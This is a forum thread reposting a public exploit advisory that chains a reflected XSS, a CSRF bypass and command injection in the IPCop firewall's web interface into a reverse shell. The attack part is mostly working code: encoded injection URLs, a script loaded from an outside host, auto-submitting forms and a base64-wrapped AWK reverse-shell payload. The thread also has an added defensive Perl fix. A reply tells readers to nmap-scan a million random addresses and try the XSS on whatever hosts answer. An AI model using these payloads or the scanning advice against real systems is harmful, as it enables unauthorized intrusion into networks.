Aerosol Posted December 24, 2014

#######################################################################
# Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution
# Date: 21/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php
# Version: 2.1.4
# Category: Remote Command Execution
# Google dork:
# Tested on: IPCop distribution
#######################################################################

IPCop firewall/router distribution description :
======================================================================
IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework.
Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly.
IPCop includes a simple, user-managed update mechanism to install security updates when required.

In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain Remote Command Execution (reverse-shell).
In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL.

Proof of Concept 1 :
======================================================================
A non-persistent XSS in a GET param is available in ipinfo.cgi. The injection can be URL-encoded with certain browsers.
This XSS works on IE and affects IPCop version <= 2.1.2 (patched in the 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC:
https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>

Proof of Concept 2 :
======================================================================
CSRF protection bypass from the previous XSS.
IPCop is protected against CSRF attacks with a Referer check on all pages.
It's possible to bypass this protection with the XSS detailed previously.
To do this, load a third-party JS script with the XSS, and make an Ajax request in the IPCop context (so with the right Referer).
This XSS works on IE and affects IPCop version <= 2.1.2 (patched in the 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC :
Host a third-party JS script on a web server accessible from IPCop. In this JS script, load jQuery dynamically and perform any AJAX request to a targeted IPCop page.
All AJAX requests bypass the CSRF protection.

 * Third-party JS script, hosted at http://<PENTESTER_WEBSITE>/x.js:

var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq); // jquery dynamic loading

function loadX(){
    $.ajax({
        type: 'POST',
        url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>",
        contentType: 'application/x-www-form-urlencoded;charset=utf-8',
        dataType: 'text',
        data: '<YOUR_DATA>'
    }); // payload of your choice
}
setTimeout("loadX()",2000);

 * XSS to load this third-party script dynamically :

var head=document.getElementsByTagName('head')[0];
var script= document.createElement('script');
script.type= 'text/javascript';
script.src= 'http://<PENTESTER_WEBSITE>/x.js';
head.appendChild(script);

 * Escape this string with the escape() Javascript method :

%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09

 * Make the final URL with the XSS in the GET param that loads the third-party script dynamically (IE) :

https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>

Proof of Concept 3 :
======================================================================
Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution.
Affected version <= 2.1.4 (patched in the 2.1.5 upgrade).

File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) :
$output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`;

The $cgiparams{'TABLE'} isn't sanitized before execution on the command line. It's possible to change the "TABLE" POST data to arbitrary data.
To chain commands in this instruction, only || is usable (not && nor . So the first part of the command needs to return a false status.
It can be done with no additional param :
/usr/local/bin/iptableswrapper <NOTHING HERE> || <my personal command will be executed here>

So the RCE can be exploited with this PoC (if the Referer is set to the IPCop URL) :

<html>
 <body>
  <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
   <input type='hidden' name='TABLE' value='||touch /tmp/x;#' />
   <input type='hidden' name='CHAIN' value='' />
   <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
  </form>
  <script>document.forms['x'].submit();</script>
 </body>
</html>

Note that the ACTION POST param depends on the IPCop language defined.

Proof of Concept 4 :
======================================================================
Finally, with these three previous PoCs, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop.
IPCop does not have netcat nor telnet, socat, python, ruby, php etc ...
The only way to make a reverse-shell is to use Perl or AWK techniques.
In this PoC, it's the AWK technique that is used :
(From the ASafety reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/)

 * The one-line reverse-shell with AWK is :

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

 * To bypass the IPCop filter, you need to encode this command in base64 (after modifying <IP> and <PORT>) :

YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA==

 * Place a \n at each block of 64 chars in the base64 version :

YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==

 * This payload can be echo'ed and decoded with openssl, on the fly, on IPCop :

echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d

 * To execute this payload, add backticks and an eval call :

eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`

 * Your payload is ready to be used in the TABLE POST param of iptablesgui.cgi, like the previous PoC :

||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#

 * Full PoC (IPCop <= 2.1.2, RXSS patched in the 2.1.3 upgrade but RCE available up to 2.1.4, patched in the 2.1.5 upgrade) (if the Referer is set to the IPCop URL, and a netcat is listening: # nc -l -vv -p 1337) :

<html>
 <body>
  <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
   <input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' />
   <input type='hidden' name='CHAIN' value='' />
   <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
  </form>
  <script>document.forms['x'].submit();</script>
 </body>
</html>

Note that no <IP>/<Port> are defined in the previous payload; you need to reproduce these different steps.

 * With the XSS method to bypass the CSRF Referer check, the third-party JS script can be :

var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);

function loadX(){
    $.ajax({
        type: 'POST',
        url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi",
        contentType: 'application/x-www-form-urlencoded;charset=utf-8',
        dataType: 'text',
        data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23'
    });
}
setTimeout("loadX()",2000);

 * A demonstration video has been made as a PoC here (IPCop 2.0.6 but works on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMg

Solution:
======================================================================
- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.
- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5.

Report timeline :
======================================================================
2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)
2013-04-09 : Second alert sent to the team (via Sourceforge)
2013-04-25 : Third alert sent to the IPCop English support forum
2013-04-25 : PoC added in private on the Sourceforge bug tracker, no response
2013-04-30 : Ticket priority changed from 5 to 8, no response.
2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.
2014-12-21 : Public article on ASafety and public advisory

Additional resources :
======================================================================
- www.ipcop.org
- sourceforge.net/p/ipcop/bugs/807/
- sourceforge.net/projects/ipcop/
- www.synetis.com
- www.asafety.fr
- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution
- www.youtube.com/watch?v=ovhogZGHyMg

Credits :
======================================================================
[Synetis ASCII-art logo]
www.synetis.com
Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
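The advisory above quotes the two vulnerable lines but not what a fixed version looks like. The following is an added example from a defender's perspective, not the advisory's code nor IPCop's: it shows the two root causes side by side with their hardened forms. The function names are hypothetical; the wrapper path is the one quoted from iptablesgui.cgi, and the allowlist of table names is an assumption about what the wrapper accepts.

```perl
#!/usr/bin/perl
# Added example, not IPCop project code: hardened versions of the two
# patterns the advisory describes. Function names are hypothetical; the
# wrapper path is the one quoted from iptablesgui.cgi.
use strict;
use warnings;

# --- PoC 1 / PoC 2 root cause: request-derived strings ($addr, $hostname,
# $whoisname in the quoted ipinfo.cgi line) concatenated into the page
# unescaped. Escaping every reflected value closes the XSS and, with it,
# the same-origin script route around the Referer check.
sub html_escape {
    my ($s) = @_;
    return '' unless defined $s;
    my %map = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$map{$1}/g;
    return $s;
}

# --- PoC 3 root cause: $cgiparams{'TABLE'} interpolated into a backtick
# command. Step 1: accept only a known table name. The allowlist assumes
# the wrapper takes standard netfilter table names (an assumption of this
# example). Returns the validated name, or undef for anything else.
my %ALLOWED_TABLE = map { $_ => 1 } qw(filter nat mangle raw);

sub sanitize_table {
    my ($t) = @_;
    return unless defined $t && $t =~ /\A([a-z]+)\z/;
    return $ALLOWED_TABLE{$1} ? $1 : undef;
}

# Step 2: run the wrapper without a shell. The list form of open() passes
# each argument straight to exec(), so shell metacharacters (| ; ` $ #) in
# $table carry no meaning even if validation were ever bypassed.
# Returns (exit status, captured stdout). The original's "2>&1" needed a
# shell; without one, stderr goes to the web server's error log instead.
sub run_iptables_wrapper {
    my ($table) = @_;
    my $name = sanitize_table($table);
    return (1, "invalid table name\n") unless defined $name;
    open(my $fh, '-|', '/usr/local/bin/iptableswrapper', $name)
        or return (1, "cannot run wrapper: $!\n");
    my $output = do { local $/; <$fh> };
    close($fh);
    return ($? >> 8, defined $output ? $output : '');
}

# Demonstration on constructed inputs. sanitize_table() and html_escape()
# need no wrapper binary, so this part runs on any machine with perl.
unless (caller) {
    for my $raw ('filter', 'NAT', '||touch /tmp/x;#', 'nat; id') {
        my $ok = sanitize_table($raw);
        printf "TABLE=%-22s -> %s\n", "'$raw'",
            defined $ok ? "accepted as '$ok'" : 'rejected';
    }
    print html_escape(q{<script>alert('XSS_by_Yann_CAM')</script>}), "\n";
}
```

Two design points: the allowlist is checked before anything reaches the wrapper, and the shell is removed entirely, so neither check depends on the other. Note that fixing the XSS is what actually restores the Referer-based CSRF protection; swapping the Referer check for a synchronizer token would not help against this chain, since script running in the IPCop origin can read the token too.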
iam60 Posted December 24, 2014

Hi, since this is a forum where some people come to learn something, could you also make a tutorial explaining how it works? Has it been tested? If so, post the images so others can learn too.

iam60 Posted December 24, 2014 (edited)

Just look at how stupid he is:

> low iq, how can you ask for a tutorial for that exploit, dude ) LOL You're incredibly stupid, I swear! that vulnerability is for a certain kind of ROUTER, not all of us have one.... Stupid fucking people...

What's that, a router? Can't you even read English to see what's written there? You're clueless in this field anyway, but at least read what it says.

Edited December 24, 2014 by iam60

Aerosol Posted December 24, 2014 (Author, edited)

> Just look at how stupid he is: What's that, a router? Can't you even read English to see what's written there? You're clueless in this field anyway, but at least read what it says.

Man, you're hopeless; it's about a firewall version, and it's been patched! Stop posting nonsense, plus you double-posted. Someone ban this kid! "router", where's the mistake, kid? I probably phrased it badly, but if you're not able to understand that, that's the second issue! It's for a firewall version specific to a certain kind of router.

Edited December 24, 2014 by Aerosol
Ganav Posted December 24, 2014

> Hi, since this is a forum where some people come to learn something, could you also make a tutorial explaining how it works? Has it been tested? If so, post the images so others can learn too.

The original post (the one from packetstorm) illustrates a way to gain access to a machine running the IPCop LINUX distribution (which serves as a firewall: it can block and filter packets according to the user's preferences). The post presents a few concepts (means or attack vectors). One of these is:

Proof of Concept 1 :
======================================================================
A non-persistent XSS in a GET param is available in ipinfo.cgi. The injection can be URL-encoded with certain browsers.
This XSS works on IE and affects IPCop version <= 2.1.2 (patched in the 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC:
https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>

So to exploit the vulnerability we need to find a machine running IPCop. We know it has port 8443 open.
We now use nmap to find machines that have that port open (it isn't a standard port, so the chances that these are running the IPCop distribution are relatively high):

nmap -iR 1000000 -oG nlog -A -p 8443 --open

1000000 is the number of machines scanned; -iR specifies that the machines' IP addresses are chosen randomly; -oG saves the results to the file nlog in the current directory; -A asks for the operating system distribution running on those machines and their names (via nslookup calls), and can be omitted to improve performance; -p 8443 checks port 8443 (whether it is open or not).

Once the scan is finished, you can take each machine with port 8443 open and try to access the administration interface like this:

https://<IP_gasit>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_bla_bla')</script>

You can use the results found to test the rest of the vulnerabilities described in that post.